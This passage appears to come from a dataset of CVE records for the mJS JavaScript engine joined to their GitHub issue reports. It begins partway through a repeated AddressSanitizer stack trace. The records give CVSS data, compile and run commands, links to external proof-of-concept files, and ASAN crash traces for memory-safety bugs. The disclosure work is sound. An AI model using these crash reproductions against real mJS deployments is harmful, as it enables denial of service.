test/mjs-uaf/build_asan/mjs.c:5958 #44 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #45 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #46 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #47 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #48 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #49 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #50 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #51 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #52 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #53 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #54 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #55 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #56 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #57 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #58 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #59 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #60 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #61 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #62 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #63 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #64 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #65 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #66 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #67 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #68 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #69 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #70 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #71 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #72 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #73 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #74 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #75 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #76 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #77 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #78 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #79 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #80 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #81 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #82 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #83 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #84 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #85 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #86 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #87 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #88 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #89 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #90 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #91 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #92 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #93 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #94 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #95 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #96 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #97 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #98 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #99 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #100 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #101 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #102 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #103 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #104 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #105 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #106 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #107 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #108 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #109 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #110 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #111 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #112 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #113 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #114 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #115 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #116 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #117 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #118 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #119 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #120 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #121 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #122 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #123 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #124 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #125 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #126 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #127 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #128 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #129 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #130 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #131 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #132 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #133 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #134 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #135 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #136 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #137 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #138 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #139 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #140 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #141 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #142 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #143 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #144 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #145 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #146 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #147 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #148 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #149 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #150 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #151 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #152 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #153 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #154 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #155 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #156 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #157 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #158 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #159 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #160 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #161 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #162 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #163 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #164 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #165 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #166 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #167 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #168 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #169 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #170 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #171 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #172 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #173 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #174 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #175 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #176 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #177 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #178 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #179 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #180 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #181 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #182 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #183 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #184 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #185 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #186 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #187 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #188 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #189 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #190 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #191 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #192 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #193 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #194 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #195 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #196 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #197 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #198 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #199 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #200 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #201 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #202 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #203 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #204 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #205 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #206 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #207 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #208 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #209 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #210 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #211 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #212 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #213 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #214 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #215 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #216 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #217 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #218 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #219 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #220 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #221 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #222 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #223 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #224 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #225 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #226 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #227 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #228 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #229 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #230 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #231 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #232 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #233 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #234 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #235 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #236 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #237 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #238 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #239 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #240 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #241 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #242 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #243 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #244 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #245 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #246 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #247 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #248 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #249 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #250 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #251 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==29997==ABORTING ```
AddressSanitizer: stack-buffer-overflow in json_parse_array() mjs.c:5952
https://api.github.com/repos/cesanta/mjs/issues/158/comments
0
2021-05-19T08:36:33Z
2021-05-19T08:36:33Z
https://github.com/cesanta/mjs/issues/158
895,156,817
158
CVE-2021-33439
2022-07-26T13:15:08.677
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is Integer overflow in gc_compact_strings() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/159" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/159
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-8d05d-gc_compact_strings-negative-size-param ASAN info: ```C ==10043==ERROR: AddressSanitizer: negative-size-param: (size=-2133205735) #0 0x7f03ca4b105d in __asan_memmove (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8d05d) #1 0x42dd05 in gc_compact_strings test/mjs-uaf/build_asan/mjs.c:11575 #2 0x42e26a in mjs_gc test/mjs-uaf/build_asan/mjs.c:11646 #3 0x42df57 in maybe_gc test/mjs-uaf/build_asan/mjs.c:11592 #4 0x424572 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9375 #5 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #6 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #7 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #8 0x7f03c9e7682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) 0x7f01c397fe41 is located 2702202433 bytes inside of 4863964088-byte region [0x7f012287a800,0x7f024471dbb8) allocated by thread T0 here: #0 0x7f03ca4bc961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x402baa in mbuf_resize test/mjs-uaf/build_asan/mjs.c:4878 #2 0x43f0fb in mjs_mk_string test/mjs-uaf/build_asan/mjs.c:13934 #3 0x4403f9 in s_concat test/mjs-uaf/build_asan/mjs.c:14115 #4 0x422362 in do_op test/mjs-uaf/build_asan/mjs.c:8996 #5 0x42247a in op_assign test/mjs-uaf/build_asan/mjs.c:9009 #6 0x4231f9 in exec_expr test/mjs-uaf/build_asan/mjs.c:9212 #7 0x4259f6 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9683 #8 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #9 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #10 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #11 0x7f03c9e7682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memmove ==10043==ABORTING ```
AddressSanitizer: negative-size-param in gc_compact_strings() mjs.c:11575
https://api.github.com/repos/cesanta/mjs/issues/159/comments
0
2021-05-19T08:37:26Z
2021-05-19T08:37:26Z
https://github.com/cesanta/mjs/issues/159
895,157,862
159
CVE-2021-33440
2022-07-26T13:15:08.717
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_bcode_commit() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/163
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-7954-mjs_bcode_commit-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==8485==ERROR: AddressSanitizer: SEGV on unknown address 0x00000001dce5 (pc 0x00000041dada bp 0x7ffcd7b8dcf0 sp 0x7ffcd7b8da28 T0) #0 0x41dad9 in mjs_bcode_commit test/mjs-uaf/build_asan/mjs.c:8051 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fb23d82f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:8051 mjs_bcode_commit ==8485==ABORTING ```
A NULL pointer dereference in the function mjs_bcode_commit() mjs.c:8051
https://api.github.com/repos/cesanta/mjs/issues/163/comments
0
2021-05-19T08:40:50Z
2021-05-19T08:40:50Z
https://github.com/cesanta/mjs/issues/163
895,161,871
163
CVE-2021-33441
2022-07-26T13:15:08.757
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in exec_expr() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/165
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9035-exec_expr-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9001==ERROR: AddressSanitizer: SEGV on unknown address 0x00000042a6c5 (pc 0x000000422d9c bp 0x7ffd55fb7a40 sp 0x7ffd55fb7910 T0) #0 0x422d9b in exec_expr test/mjs-uaf/build_asan/mjs.c:9144 #1 0x4259f6 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9683 #2 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #3 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #4 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #5 0x7f019dc4882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:9144 exec_expr ==9001==ABORTING ```
A NULL pointer dereference in the function exec_expr() mjs.c:9144
https://api.github.com/repos/cesanta/mjs/issues/165/comments
0
2021-05-19T08:42:37Z
2021-05-19T08:42:37Z
https://github.com/cesanta/mjs/issues/165
895,163,896
165
CVE-2021-33442
2022-07-26T13:15:08.803
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in json_printf() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/161" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/161
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
